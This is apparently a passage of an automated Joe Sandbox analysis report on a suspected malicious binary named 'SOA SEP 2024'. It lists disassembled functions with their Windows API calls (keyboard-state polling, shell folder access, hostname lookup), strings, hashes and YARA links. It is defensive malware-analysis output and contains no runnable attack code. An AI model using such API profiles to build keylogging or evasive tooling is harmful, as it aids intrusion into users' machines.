Instruction Fuzzy Hash: 97216670205245EFE7255B60ECDDB263F69FB8A385F008124F50686272DB7D5D11DB25

Function 007B02EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 0076936C: __swprintf.LIBCMT ref: 007693AB
Part of subcall function 0076936C: __itow.LIBCMT ref: 007693DF

CoInitialize.OLE32(00000000), ref: 007B034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007B03DE
SHGetDesktopFolder.SHELL32(?), ref: 007B03F2
CoCreateInstance.OLE32(007EDA8C,00000000,00000001,00813CF8,?), ref: 007B043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007B04AD
CoTaskMemFree.OLE32(?,?), ref: 007B0505
_memset.LIBCMT ref: 007B0542
SHBrowseForFolderW.SHELL32(?), ref: 007B057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007B05A1
CoTaskMemFree.OLE32(00000000), ref: 007B05A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007B05DF
CoUninitialize.OLE32(00000001,00000000), ref: 007B05E1

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 076e9d47d445d56b6ca6b3199d7de69c13633a476164e93a206030149e7bae05
Instruction ID: 631a50f878959dab8074837db4cf543f62a883eeaa6294e3f992f82e42002d12
Opcode Fuzzy Hash: 076e9d47d445d56b6ca6b3199d7de69c13633a476164e93a206030149e7bae05
Instruction Fuzzy Hash: 20B1D975A00109EFDB14DFA4C888EAEBBB9FF49314B148469F906EB251D774ED41CB90

Function 007A2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 007A2ED6
SetKeyboardState.USER32(?), ref: 007A2F41
GetAsyncKeyState.USER32(000000A0), ref: 007A2F61
GetKeyState.USER32(000000A0), ref: 007A2F78
GetAsyncKeyState.USER32(000000A1), ref: 007A2FA7
GetKeyState.USER32(000000A1), ref: 007A2FB8
GetAsyncKeyState.USER32(00000011), ref: 007A2FE4
GetKeyState.USER32(00000011), ref: 007A2FF2
GetAsyncKeyState.USER32(00000012), ref: 007A301B
GetKeyState.USER32(00000012), ref: 007A3029
GetAsyncKeyState.USER32(0000005B), ref: 007A3052
GetKeyState.USER32(0000005B), ref: 007A3060

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 4c5accc0f55c38c4c8c4e62aad04256af1f4ea3724a5ea971bfa9cc10ed03536
Instruction ID: 6876741bfc4b548cccd41147892748bfd477345b4cfaa5adf2be764db7a21b79
Opcode Fuzzy Hash: 4c5accc0f55c38c4c8c4e62aad04256af1f4ea3724a5ea971bfa9cc10ed03536
Instruction Fuzzy Hash: E551E9205087D869FB35DB6484547AABBB45F93340F088789D5C25A1C3DA9C9B8DC762

Function 0079ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0079ED1E
GetWindowRect.USER32(00000000,?), ref: 0079ED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0079ED8E
GetDlgItem.USER32(?,00000002), ref: 0079ED99
GetWindowRect.USER32(00000000,?), ref: 0079EDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0079EE01
GetDlgItem.USER32(?,000003E9), ref: 0079EE0F
GetWindowRect.USER32(00000000,?), ref: 0079EE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0079EE63
GetDlgItem.USER32(?,000003EA), ref: 0079EE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0079EE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 0079EE9B

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 1cba96a4f5b3dac244a798f4595dfa55d5870ad93b7d034ae653dcaa1a2f6a20
Instruction ID: bf5920bd1ed0756cbdb82d628a6c8a6e8c39f9d9bf3904243f2414b5de699fc6
Opcode Fuzzy Hash: 1cba96a4f5b3dac244a798f4595dfa55d5870ad93b7d034ae653dcaa1a2f6a20
Instruction Fuzzy Hash: 08512071B00205AFDF18CF69DD85AAEBBBAFB88740F148129F919D7290D7759D008B14

Function 0077B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0077B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0077B759,?,00000000,?,?,?,?,0077B72B,00000000,?), ref: 0077BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0077B72B), ref: 0077B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,0077B72B,00000000,?,?,0077B2EF,?,?), ref: 0077B88D
DestroyAcceleratorTable.USER32(00000000), ref: 007DD8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0077B72B,00000000,?,?,0077B2EF,?,?), ref: 007DD8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0077B72B,00000000,?,?,0077B2EF,?,?), ref: 007DD8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0077B72B,00000000,?,?,0077B2EF,?,?), ref: 007DD90A
DeleteObject.GDI32(00000000), ref: 007DD91C

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 4894ae8ef736c373ddb5b91b45cc069ae05a04fde5b8d15c77a51a2d3aaf9428
Instruction ID: b975e4bcf5cef486549d9461d90cf3215271a1cb5488c7567fbd38b249af44c6
Opcode Fuzzy Hash: 4894ae8ef736c373ddb5b91b45cc069ae05a04fde5b8d15c77a51a2d3aaf9428
Instruction Fuzzy Hash: 25618A30501700DFDF369F18D988B29B7B5FBA4351F25852EE08A8AA60C739BC91DB85

Function 0077B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 0077B526: GetWindowLongW.USER32(?,000000EB), ref: 0077B537

GetSysColor.USER32(0000000F), ref: 0077B438

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 6decb6bd7351f0fc893070cb6b3549d56d0e2ce40336e4b03339231a2239ed30
Instruction ID: 69168046e2578f134dd62cc5888ba532bd91400800d0a58aac99d4f7a695af6f
Opcode Fuzzy Hash: 6decb6bd7351f0fc893070cb6b3549d56d0e2ce40336e4b03339231a2239ed30
Instruction Fuzzy Hash: DB41A030101194AFDF305F28DC89BB93B66AB0A771F19C261FD698E1E6D7388C42DB25

Function 007A690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 007A6923
_wcscpy.LIBCMT ref: 007A6934
__wsplitpath.LIBCMT ref: 007A6958
__wsplitpath.LIBCMT ref: 007A6979
_wcscpy.LIBCMT ref: 007A699B
_wcscpy.LIBCMT ref: 007A69B9
_wcscpy.LIBCMT ref: 007A69C7
_wcscat.LIBCMT ref: 007A69D6
_wcscat.LIBCMT ref: 007A6A2B
_wcscat.LIBCMT ref: 007A6A61
_wcscat.LIBCMT ref: 007A6A73

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: be8784d7b9bdf0fb9ca0af49e28883579c744d3ae8a179773dc6b391accd0f85
Instruction ID: b82308651d1a6c3262275d56779f478bd66bc945a9303eb65574388ac6ecb0a9
Opcode Fuzzy Hash: be8784d7b9bdf0fb9ca0af49e28883579c744d3ae8a179773dc6b391accd0f85
Instruction Fuzzy Hash: DF41147788511CAECF61EB94CC55DDF73BCEB84300F0041A6B655A2051EA74ABE98FA0

Function 007AD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(007FDC00,007FDC00,007FDC00), ref: 007AD7CE
GetDriveTypeW.KERNEL32(?,00813A70,00000061), ref: 007AD898
_wcscpy.LIBCMT ref: 007AD8C2

Strings

removable, xrefs: 007AD800
cdrom, xrefs: 007AD7EA
unknown, xrefs: 007AD859
fixed, xrefs: 007AD816
all, xrefs: 007AD7D4
ramdisk, xrefs: 007AD842
network, xrefs: 007AD82C

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 54142990d8b2ee23c072a82fee50b137aec05745f26ece7e91c70ab293d816dd
Instruction ID: b79065c3261b4bf41d7f6612ca97db90587aa43372f74ad4ddb83f2b3db1470c
Opcode Fuzzy Hash: 54142990d8b2ee23c072a82fee50b137aec05745f26ece7e91c70ab293d816dd
Instruction Fuzzy Hash: 9451B435104300DFC710EF14C885AAEB7A9FF85354F108A2DF9AB57692DB39ED49CA52

Function 0076936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 007693AB
__itow.LIBCMT ref: 007693DF

Part of subcall function 00781557: _xtow@16.LIBCMT ref: 00781578

Strings

0x%p, xrefs: 007D4CAD
%.15g, xrefs: 007693A5
True, xrefs: 007D4C8C
False, xrefs: 007D4C93

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: c7fd008059cc057b207a276b423bd0176b5093b2995beab74a3903661b194e9e
Instruction ID: 2ea05db7da799560bc18c9226dde0e47545d791169ac1a692d0d439897b9bd39
Opcode Fuzzy Hash: c7fd008059cc057b207a276b423bd0176b5093b2995beab74a3903661b194e9e
Instruction Fuzzy Hash: D841A472614204EBDB24EB75D946E6AB7FCEF44340F2044AFE54ED7381EA399941CB60

Function 007CA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007CA259
CreateCompatibleDC.GDI32(00000000), ref: 007CA260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007CA273
SelectObject.GDI32(00000000,00000000), ref: 007CA27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 007CA286
DeleteDC.GDI32(00000000), ref: 007CA28F
GetWindowLongW.USER32(?,000000EC), ref: 007CA299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007CA2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007CA2B9

Strings

static, xrefs: 007CA1F1

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 5cf112925ad167950f6286216fd7a6db50072e3026d1a7025354004d2dfa9e2e
Instruction ID: 379f49a49d17701e6412ab421373abb66ccb6f2aff86b6987e291a85f49e815e
Opcode Fuzzy Hash: 5cf112925ad167950f6286216fd7a6db50072e3026d1a7025354004d2dfa9e2e
Instruction Fuzzy Hash: C7316931101218BFDF215FA4DC89FEA3B69FF5D365F114218FA19AA0A0C7399C11DBA5

Function 007A6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 007A6F1D
gethostname.WSOCK32(?,00000100), ref: 007A6F37
gethostbyname.WSOCK32(?), ref: 007A6F44
_wcscpy.LIBCMT ref: 007A6F6C
inet_ntoa.WSOCK32(?), ref: 007A6F8A
_strcat.LIBCMT ref: 007A6F98
_wcscpy.LIBCMT ref: 007A6FAF
WSACleanup.WSOCK32 ref: 007A6FBD
_wcscpy.LIBCMT ref: 007A6FCB

Strings

0.0.0.0, xrefs: 007A6F66

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: f0781d8cb75ddf373aabf140a6db89be1bd6e9b51ec26657b780010ced2789bb
Instruction ID: a0c522369c4d4cc4bee380a435c69d6d61a682adc2622ec4003470addc2e3bab
Opcode Fuzzy Hash: f0781d8cb75ddf373aabf140a6db89be1bd6e9b51ec26657b780010ced2789bb
Instruction Fuzzy Hash: 3711E472604114AFDB24AB70AC4EEDA77ACEF85710F0441A5F105AA081EF7CAE858BA4

Function 0078500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00785047

Part of subcall function 00787C0E: __getptd_noexit.LIBCMT ref: 00787C0E

__gmtime64_s.LIBCMT ref: 007850E0
__gmtime64_s.LIBCMT ref: 00785116
__gmtime64_s.LIBCMT ref: 00785133
__allrem.LIBCMT ref: 00785189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007851A5
__allrem.LIBCMT ref: 007851BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007851DA
__allrem.LIBCMT ref: 007851F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0078520F
__invoke_watson.LIBCMT ref: 00785280

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: a2ca131a71cb2ed1a1c159317a4a55608e1a561ba67e7491234e814d8af33c1d
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 5071C6B2A81F17EBDB14BE78DC45BAAB3A9BF00764F144229F510D6281EB78DD4087D0

Function 007A4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A4DF8
GetMenuItemInfoW.USER32(00821708,000000FF,00000000,00000030), ref: 007A4E59
SetMenuItemInfoW.USER32(00821708,00000004,00000000,00000030), ref: 007A4E8F
Sleep.KERNEL32(000001F4), ref: 007A4EA1
GetMenuItemCount.USER32(?), ref: 007A4EE5
GetMenuItemID.USER32(?,00000000), ref: 007A4F01
GetMenuItemID.USER32(?,-00000001), ref: 007A4F2B
GetMenuItemID.USER32(?,?), ref: 007A4F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007A4FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A4FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A4FEB

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 9202b46d60d0f69c76c39408ce939710265bddf584c07123bc8f1d97f906825f
Instruction ID: 9c6c2c707ba13603736619c086c1fe161d325bcd219861b18ebb619854dc5343
Opcode Fuzzy Hash: 9202b46d60d0f69c76c39408ce939710265bddf584c07123bc8f1d97f906825f
Instruction Fuzzy Hash: 43619371500289EFDF21CF68DC889AE7BB8FBC6308F184259F54197251D7BA9D05CB21

Function 007C9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007C9C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007C9C9B
GetWindowLongW.USER32(?,000000F0), ref: 007C9CBF
_memset.LIBCMT ref: 007C9CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007C9CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007C9D5A

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: c6cfe283aa7b662dec2051df30b32b426451bfcc0781dae6dd16eb36a1f3a5d1
Instruction ID: dd896a0c040f01d70dc6a524fb5fc03772bb4f69a9580cddc815b4508a5aaee7
Opcode Fuzzy Hash: c6cfe283aa7b662dec2051df30b32b426451bfcc0781dae6dd16eb36a1f3a5d1
Instruction Fuzzy Hash: 13616975A00208EFDB20DFA4CC89FEE77B8EB19704F144159FA15A7291D778AD42DB60

Function 007994E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 007994FE
SafeArrayAllocData.OLEAUT32(?), ref: 00799549
VariantInit.OLEAUT32(?), ref: 0079955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 0079957B
VariantCopy.OLEAUT32(?,?), ref: 007995BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 007995D2
VariantClear.OLEAUT32(?), ref: 007995E7
SafeArrayDestroyData.OLEAUT32(?), ref: 007995F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007995FD
VariantClear.OLEAUT32(?), ref: 0079960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0079961A

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 40c98033f2070d94bd6943915ce9bff5009366709457b6301f4811e2e42c130b
Instruction ID: 4a2e3f6ce2a7ae545cc3614e5b0ded94fe123f8b284d1bc71841839908706e46
Opcode Fuzzy Hash: 40c98033f2070d94bd6943915ce9bff5009366709457b6301f4811e2e42c130b
Instruction Fuzzy Hash: D8418030900259EFDF11DFA8D8889DEBB78FF18350F008069E911A7291DB38EA45CBA1

Function 007BADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 0076936C: __swprintf.LIBCMT ref: 007693AB
Part of subcall function 0076936C: __itow.LIBCMT ref: 007693DF

CoInitialize.OLE32 ref: 007BADF6
CoUninitialize.OLE32 ref: 007BAE01
CoCreateInstance.OLE32(?,00000000,00000017,007ED8FC,?), ref: 007BAE61
IIDFromString.OLE32(?,?), ref: 007BAED4
VariantInit.OLEAUT32(?), ref: 007BAF6E
VariantClear.OLEAUT32(?), ref: 007BAFCF

Strings

NULL Pointer assignment, xrefs: 007BAEA6
Invalid parameter, xrefs: 007BAEED
Failed to create object, xrefs: 007BAE6C, 007BAF22

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
